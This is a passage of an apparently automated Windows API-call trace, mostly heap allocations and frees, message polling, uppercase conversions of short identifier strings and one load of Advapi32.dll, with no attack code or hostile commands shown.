Size=0x10) returned 0x34aa868 [0252.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.745] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0252.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0252.745] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0252.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2b0 [0252.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0252.746] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0252.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0252.746] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0252.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0252.747] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.747] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0252.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0252.747] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7a8 [0252.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0252.747] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0252.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0252.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0252.748] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0252.748] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0252.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.748] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0252.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0252.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0252.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0252.750] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0252.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0252.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0252.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0252.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0252.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0252.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0252.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.753] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0252.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.754] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.754] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0252.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0252.754] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0252.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1868 [0252.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa550 [0252.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0252.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0252.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0252.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0252.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0252.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0252.755] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0252.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0252.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0252.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0252.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0252.756] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0252.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0252.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0252.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0252.757] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0252.757] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0252.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0252.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.758] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0252.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.758] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0252.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0252.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0252.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0252.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0252.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0252.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.759] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0252.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0252.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0252.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0252.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0252.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0252.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0252.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0252.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0252.760] RtlAllocateHeap 